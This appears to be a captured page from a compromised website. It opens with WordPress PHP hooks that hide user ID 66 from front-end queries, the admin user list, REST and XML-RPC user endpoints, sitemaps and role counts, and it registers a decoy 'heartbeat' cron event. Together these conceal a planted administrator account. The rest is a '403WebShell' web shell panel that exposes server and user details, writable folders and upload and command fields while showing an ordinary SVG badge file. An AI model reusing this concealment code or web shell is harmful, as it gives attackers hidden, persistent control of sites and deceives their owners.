add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/badgeurope.eu/public/images/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/badgeurope.eu/public/images/step1.svg
<svg width="70" height="111" viewBox="0 0 70 111" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M31.5562 1.64491C33.3276 -0.545303 36.6617 -0.551304 38.4451 1.64491C41.4482 5.36228 42.4532 5.5543 46.7118 3.5441C49.2705 2.33798 52.2676 3.80513 52.9177 6.5504C54.0092 11.1439 54.7756 11.8249 59.5501 11.8699C62.3742 11.8969 64.4469 14.5342 63.8445 17.2885C62.8365 21.9299 63.2719 22.866 67.5245 24.9752C70.0504 26.2293 70.79 29.4967 69.0574 31.7319C66.1408 35.4793 66.1378 36.5144 69.0574 40.2647C70.79 42.5 70.0504 45.7673 67.5245 47.0214C63.2898 49.1216 62.8335 50.0487 63.8445 54.7082C64.4439 57.4624 62.3742 60.0967 59.5501 60.1267C55.7597 60.1657 54.2388 59.9047 52.9177 65.4462C52.2676 68.1915 49.2705 69.6586 46.7118 68.4525C43.2912 66.8384 42.0237 65.9263 38.4451 70.3517C36.6617 72.5479 33.3336 72.5509 31.5562 70.3517C28.5531 66.6373 27.5452 66.4423 23.2866 68.4525C20.7398 69.6556 17.7397 68.2065 17.0806 65.4462C15.9951 60.8918 15.2645 60.1717 10.4482 60.1267C7.63005 60.0997 5.55444 57.4684 6.15684 54.7082C7.15886 50.0937 6.73837 49.1336 2.47681 47.0214C-0.049112 45.7703 -0.79168 42.494 0.94396 40.2647C3.84862 36.5324 3.86353 35.4793 0.94396 31.7319C-0.79168 29.5027 -0.049112 26.2263 2.47681 24.9752C6.6668 22.899 7.17377 21.9809 6.15386 17.2915C5.55444 14.5312 7.62706 11.8999 10.4482 11.8729C15.2615 11.8249 15.9921 11.1048 17.0806 6.5534C17.7397 3.79313 20.7428 2.34398 23.2866 3.5471C27.5064 5.5423 28.5353 5.38028 31.5562 1.64491Z" fill="#8D6CD3"/>
<path d="M13.3545 101.519L16.4697 88.3594H18.21L18.6074 90.5508L15.2881 104H13.4189L13.3545 101.519ZM11.7539 88.3594L14.332 101.519L14.1172 104H12.0332L8.56348 88.3594H11.7539ZM21.3467 101.465L23.8926 88.3594H27.083L23.624 104H21.54L21.3467 101.465ZM19.1875 88.3594L22.3242 101.572L22.2383 104H20.3691L17.0283 90.54L17.458 88.3594H19.1875ZM31.6592 87.5V104H28.5654V87.5H31.6592ZM31.2188 97.7803H30.3701C30.3773 96.971 30.4847 96.2262 30.6924 95.5459C30.9001 94.8584 31.1973 94.264 31.584 93.7627C31.9707 93.2542 32.4326 92.8604 32.9697 92.5811C33.514 92.3018 34.1156 92.1621 34.7744 92.1621C35.3473 92.1621 35.8665 92.2445 36.332 92.4092C36.8047 92.5667 37.2093 92.8245 37.5459 93.1826C37.8896 93.5335 38.1546 93.9954 38.3408 94.5684C38.527 95.1413 38.6201 95.8359 38.6201 96.6523V104H35.5049V96.6309C35.5049 96.1152 35.4297 95.7106 35.2793 95.417C35.1361 95.1162 34.9248 94.9049 34.6455 94.7832C34.3734 94.6543 34.0368 94.5898 33.6357 94.5898C33.1917 94.5898 32.8122 94.6722 32.4971 94.8369C32.1891 95.0016 31.9421 95.2308 31.7559 95.5244C31.5697 95.8109 31.4336 96.1475 31.3477 96.5342C31.2617 96.9209 31.2188 97.3363 31.2188 97.7803ZM44.4209 102.689L47.5039 92.377H50.8232L46.1504 105.751C46.0501 106.045 45.9141 106.36 45.7422 106.696C45.5775 107.033 45.3519 107.352 45.0654 107.652C44.7861 107.96 44.4316 108.211 44.002 108.404C43.5794 108.598 43.0602 108.694 42.4443 108.694C42.1507 108.694 41.9108 108.676 41.7246 108.641C41.5384 108.605 41.3164 108.555 41.0586 108.49V106.224C41.1374 106.224 41.2197 106.224 41.3057 106.224C41.3916 106.231 41.474 106.234 41.5527 106.234C41.9609 106.234 42.2939 106.188 42.5518 106.095C42.8096 106.002 43.0173 105.858 43.1748 105.665C43.3324 105.479 43.4577 105.235 43.5508 104.935L44.4209 102.689ZM43.1318 92.377L45.6562 100.799L46.0967 104.075L43.9912 104.301L39.8125 92.377H43.1318ZM57.333 99.2197H54.5938C54.6009 98.5752 54.651 98.0202 54.7441 97.5547C54.8444 97.082 55.0127 96.6559 55.249 96.2764C55.4925 95.8968 55.8148 95.5208 56.2158 95.1484C56.5524 94.8477 56.846 94.5612 57.0967 94.2891C57.3473 94.0169 57.5443 93.7376 57.6875 93.4512C57.8307 93.1576 57.9023 92.8317 57.9023 92.4736C57.9023 92.0583 57.8379 91.7145 57.709 91.4424C57.5872 91.1631 57.401 90.9518 57.1504 90.8086C56.9069 90.6654 56.599 90.5938 56.2266 90.5938C55.9186 90.5938 55.6322 90.6618 55.3672 90.7979C55.1022 90.9268 54.8838 91.1273 54.7119 91.3994C54.5472 91.6715 54.4613 92.0296 54.4541 92.4736H51.3389C51.3604 91.4925 51.5859 90.6833 52.0156 90.0459C52.4525 89.4014 53.0361 88.9251 53.7666 88.6172C54.4971 88.3021 55.3171 88.1445 56.2266 88.1445C57.2292 88.1445 58.0885 88.3092 58.8047 88.6387C59.5208 88.9609 60.0687 89.4372 60.4482 90.0674C60.8278 90.6904 61.0176 91.4495 61.0176 92.3447C61.0176 92.9678 60.8958 93.5228 60.6523 94.0098C60.4089 94.4896 60.0902 94.9372 59.6963 95.3525C59.3024 95.7679 58.8691 96.1976 58.3965 96.6416C57.9883 97.0068 57.709 97.39 57.5586 97.791C57.4154 98.1921 57.3402 98.6683 57.333 99.2197ZM54.2715 102.539C54.2715 102.081 54.429 101.701 54.7441 101.4C55.0592 101.092 55.4818 100.938 56.0117 100.938C56.5345 100.938 56.9535 101.092 57.2686 101.4C57.5908 101.701 57.752 102.081 57.752 102.539C57.752 102.983 57.5908 103.359 57.2686 103.667C56.9535 103.975 56.5345 104.129 56.0117 104.129C55.4818 104.129 55.0592 103.975 54.7441 103.667C54.429 103.359 54.2715 102.983 54.2715 102.539Z" fill="black"/>
<path d="M39.1797 22.5039V51H33.5547V28.9883L26.7969 31.1367V26.7031L38.5742 22.5039H39.1797Z" fill="white"/>
</svg>

Youez - 2016 - github.com/yon3zu
LinuXploit